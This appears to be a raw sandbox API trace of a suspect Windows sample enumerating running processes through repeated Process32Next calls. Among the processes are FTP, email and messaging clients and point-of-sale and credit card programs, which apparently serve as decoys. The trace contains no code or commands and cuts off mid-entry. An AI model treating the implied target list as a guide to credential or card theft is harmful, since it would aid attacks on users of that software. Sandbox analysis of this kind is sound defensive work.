th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0277.228] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0277.229] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0277.234] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0277.235] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0277.237] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0277.238] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0277.240] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0277.242] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0277.243] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0277.245] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0277.249] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0277.251] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0277.253] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0277.254] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0277.256] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0277.257] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0277.259] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0277.261] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0277.341] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0277.342] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0277.344] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0277.346] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0277.347] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0277.349] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0277.351] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0277.352] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0277.354] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0277.359] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0277.361] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0277.362] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0277.364] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0277.365] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0277.367] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0277.368] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0277.370] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0277.374] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0277.376] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0277.377] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0277.379] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0277.380] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0277.382] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0277.383] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0277.384] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0277.386] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0277.422] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0277.423] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0277.425] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0277.427] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0277.428] CloseHandle (hObject=0x758) returned 1 [0277.428] Sleep (dwMilliseconds=0x64) [0277.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0277.586] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.587] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0277.589] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0277.595] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0277.597] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0277.599] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0277.600] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0277.602] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0277.603] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0277.604] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.606] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.610] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0277.611] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.613] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.614] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.616] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.617] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.618] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.620] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.674] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0277.676] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0277.677] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0277.678] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.680] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0277.682] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0277.687] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0277.688] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0277.690] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0277.691] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0277.693] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0277.694] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0277.696] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0277.698] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0277.703] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0277.705] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, 